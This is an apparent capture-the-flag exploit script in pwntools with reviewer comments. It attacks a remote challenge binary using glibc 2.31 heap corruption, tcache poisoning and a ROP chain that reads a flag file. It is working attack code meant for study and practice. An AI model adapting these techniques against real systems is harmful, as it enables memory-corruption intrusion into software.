| from pwn import * from ctypes import *
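io = remote('39.106.65.110', 14188)
context.binary = './babyaul'

elf = ELF('./babyaul', checksec=False)
libc = ELF('libc-2.31.so', checksec=False)
# Host-side handle on the target's libc, used only for srand()/rand() in the
# password step. NOTE(review): dlopen-ing a second glibc into the Python
# process is fragile; glibc's rand() sequence has been stable across versions,
# so the host libc.so.6 would presumably give the same digits -- confirm before
# relying on that.
dll = cdll.LoadLibrary('libc-2.31.so')


def rc(n):
    """Receive up to ``n`` bytes from the tube."""
    return io.recv(n)


def ru(x):
    """Receive through delimiter ``x``; the delimiter itself is dropped."""
    return io.recvuntil(x, drop=True)


def sd(x):
    """Send ``x`` raw (no newline appended)."""
    return io.send(x)


def sla(a, b):
    """Wait for prompt ``a``, then send ``b`` followed by a newline."""
    return io.sendlineafter(a, b)


def ia():
    """Hand the tube over to the user."""
    return io.interactive()


def uu64(x):
    """Unpack a short little-endian leak (e.g. 6 pointer bytes) as a u64."""
    # The fill must be bytes: under Python 3 io.recv() returns bytes and
    # bytes.ljust() raises TypeError on a str fill character. b'\x00' is the
    # same object as '\x00' on Python 2, so this is safe on both.
    return u64(x.ljust(8, b'\x00'))


def libc_os(x):
    """Rebase a libc offset. ``libc_base`` is a module global assigned by the
    libc leak further down; do not call this before that leak has run."""
    return libc_base + x


def heap_os(x):
    """Rebase a heap offset. ``heap_base`` is a module global assigned by the
    heap leak further down; do not call this before that leak has run."""
    return heap_base + x


def libc_sym(x):
    """Absolute address of libc symbol ``x`` in the target process."""
    return libc_os(libc.sym[x])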
def cmd(x):
    """Pick a menu action: wait for the '>' prompt, then send ``x`` as a line."""
    io.sendlineafter('>', x)
def add(size, mode, content):
    """Menu 'add': request ``size`` bytes with ``mode`` and write ``content``.

    ``content`` is sent raw, without a trailing newline. The exploit routinely
    sends far fewer bytes than ``size``, so the target evidently reads up to
    ``size`` rather than exactly ``size``. Modes 1, 2 and 3 are used below;
    their meaning is defined by the binary, not visible here.
    """
    io.sendlineafter('>', 'add')
    io.sendlineafter('size?', str(size))
    io.sendlineafter('mode?', str(mode))
    io.send(content)
def delete(idx):
    """Menu 'del': free the chunk held in slot ``idx``."""
    io.sendlineafter('>', 'del')
    io.sendlineafter('index?', str(idx))
def show(idx):
    """Menu 'get': have the target print the contents of slot ``idx``.

    The prompt matched here is 'index?' plus a newline, unlike delete(); the
    prompts were presumably matched against the binary and are kept verbatim.
    """
    io.sendlineafter('>', 'get')
    io.sendlineafter('index?\n', str(idx))
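# Password gate: the target apparently derives a 4-character password from
# rand() seeded with time(NULL), so recompute it locally with the same libc.
cmd('pass')
dll.srand(dll.time(0))
# Each character is rand() % 43 + 48, i.e. in '0'..'Z'.
# Use bytes(), not str(): on Python 3 str(bytearray) yields the literal text
# "bytearray(b'...')", which is not the password. bytes(bytearray) is the raw
# content on both Python 2 and 3.
ans = bytes(bytearray(dll.rand() % 43 + 48 for _ in range(4)))
# NOTE(review): this assumes the client and server clocks agree to the second.
# With skew the guess is wrong and the session must be retried (or the
# neighbouring seeds +-1 tried).
sla('pass:', ans)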
# --- libc leak -----------------------------------------------------------------
# Three 0x500 requests (0x510 chunks, beyond the tcache range) followed by a
# fourth whose payload drops a fake size field (0xdb1) at offset 0x98.
# NOTE(review): the 0xb91 + 2 * 0x110 constant and its placement were evidently
# tuned against the binary's layout in a debugger; their exact role is not
# recoverable from this script.
add(0x500, 3, 'junk')
add(0x500, 3, 'junk')
add(0x500, 3, 'junk')
pld = flat({ 0x98: 0xb91 + 2 * 0x110 })
add(0x500, 3, pld)
# Free slot 0 (presumably into the unsorted bin), take it back with a single
# byte and read it: the stale fd pointer (presumably into main_arena) leaks,
# with its low byte replaced by the 'a' just written -- 0x61 is also the low
# byte of the subtracted constant, so that offset already accounts for the
# clobbered byte. The constant itself was read off a debugging session.
delete(0)
add(0x500, 3, 'a')
show(0)
libc_base = uu64(rc(6)) - (0x7f2c510a4b61 - 0x7f2c50eb8000)
environ = libc_sym('environ')
# --- heap leak -----------------------------------------------------------------
# Free slots 0 and 2 (non-adjacent, so no consolidation) so the two freed
# chunks link to each other, then take slot 0 back with exactly 8 bytes of 'a'
# to overwrite fd only; the 6 bytes following the 'a's in the read-back are bk,
# presumably a pointer to the other freed chunk. 0xbc50 is that chunk's offset
# from the heap base as observed in a debugger.
delete(0)
delete(2)
add(0x500, 3, 'a' * 8)
show(0)
ru('a' * 8)
heap_base = uu64(rc(6)) - (0x558eab44cc50 - 0x558eab441000)
# --- groom the heap for an overlapping chunk ------------------------------------
# Refill slot 2, then lay out five 0x110 (tcache-range) chunks and three 0x500
# chunks. NOTE(review): the slot numbers used below (9, 3, 10, 6, 5, 8, 7) only
# line up if the binary hands out the lowest free slot; that matches the earlier
# show(0)-after-delete(0) sequence, but it is an inference from this script.
add(0x500, 3, 'a' * 8)
add(0x100, 2, 'a' * 8)
add(0x100, 2, 'a' * 8)
add(0x100, 2, 'a' * 8)
add(0x100, 2, 'a' * 8)
add(0x100, 2, 'a' * 8)
add(0x4f0, 3, 'a' * 8)
add(0x4f0, 3, 'a' * 8)
add(0x4f0, 3, 'a' * 8)
# Re-take the first 0x500 chunk with a 0x4f8 request so the 8 bytes written at
# +0x4f0 land in the following chunk's prev_size field (0xdb0).
delete(9)
pld = flat({ 0x4f0: 0xb90 + 2 * 0x110 })
add(0x4f8, 3, pld)
# Re-take slot 3 with two forged chunk headers (size 0x501 at +8, size 0xdb1 at
# +0x98) whose fd/bk pairs point at heap offsets 0xc200 / 0xc170.
# NOTE(review): these look like unlink-check satisfiers (fd->bk == P and
# bk->fd == P), presumably aimed at the binary's pointer table; the offsets were
# read off a debugger and cannot be verified from the script alone.
delete(3)
pld = flat({
    8: 0x501,
    0x10: heap_os(0x557bbfbd9200 - 0x557bbfbcd000),
    0x18: heap_os(0x557bbfbd9200 - 0x557bbfbcd000),
    0x98: 0xb91 + 2 * 0x110,
    0xa0: heap_os(0x557bbfbd9170 - 0x557bbfbcd000),
    0xa8: heap_os(0x557bbfbd9170 - 0x557bbfbcd000)
})
add(0x500, 3, pld)
# Freeing slot 10 (a 0x500 chunk sitting behind the forged prev_size) is
# presumably what triggers backward consolidation and yields a large free
# region overlapping the 0x110 chunks in slots 5 and 6, which are freed next.
delete(10)
delete(6)
delete(5)
# --- stack leak via tcache poisoning ---------------------------------------------
# Through the overlapping 0x500 allocation, overwrite a freed 0x110 chunk's
# tcache `next` (at +0x470) with environ - 0x10. The first 0x100 request then
# returns the poisoned chunk and the second returns environ - 0x10; 16 bytes of
# 'a' stop right before environ, so the read-back prints its value, a stack
# pointer.
# NOTE(review): this only works because libc 2.31 has no safe-linking (tcache
# pointer mangling arrived in 2.32); on a newer libc the stored pointer would
# need the (addr >> 12) XOR applied.
add(0x500, 3, flat({0x470: environ - 0x10}))
add(0x100, 2, 'a')
add(0x100, 2, 'a' * 0x10)
show(10)
ru('a' * 0x10)
# environ - 0x3f0 is the saved return address targeted below; the distance was
# taken from a debugging session and is specific to this binary's stack frame.
ret_addr = uu64(rc(6)) - (0x7fff4817b6f8 - 0x7fff4817b308)
# --- second poisoning: make the next-but-one 0x100 request return ret_addr -------
delete(8)
delete(7)
add(0x500, 3, flat({0x180: ret_addr}))
# This request consumes the poisoned chunk and, as a side effect, plants the
# "flag" filename on the heap; 0xc8a0 is where it landed in a debugger.
add(0x100, 2, 'flag\x00')
flag_str_addr = heap_os(0x5578779648a0 - 0x557877958000)
# ROP: open("flag", O_RDONLY); read(3, heap+0x200, 0x30); write(1, heap+0x200, rdx)
open_addr = libc_sym('open')
read_addr = libc_sym('read')
write_addr = libc_sym('write')
# Gadget offsets are specific to the shipped libc-2.31.so build.
pop_rdi = libc_os(0x0000000000023b72)
pop_rsi = libc_os(0x000000000002604f)
pop_rdx_r12 = libc_os(0x0000000000119241)
# NOTE(review): fd 3 assumes only stdin/stdout/stderr are open in the target, and
# rdx is not re-set before write(), so the byte count relies on read() leaving
# rdx at 0x30 -- popping rdx again before write_addr would make this robust.
# The 0x80-byte chain fits comfortably in the 0x100 request that delivers it.
rop_chain = flat([
    pop_rdi, flag_str_addr, pop_rsi, 0, open_addr,
    pop_rdi, 3, pop_rsi, heap_base + 0x200, pop_rdx_r12, 0x30, 0, read_addr,
    pop_rdi, 1, write_addr
])
# Mode 1 here (2 elsewhere) -- whatever it selects in the binary, this request
# is served from ret_addr, so the chain is written over the saved return
# address and runs on the next function return.
add(0x100, 1, rop_chain)
ia()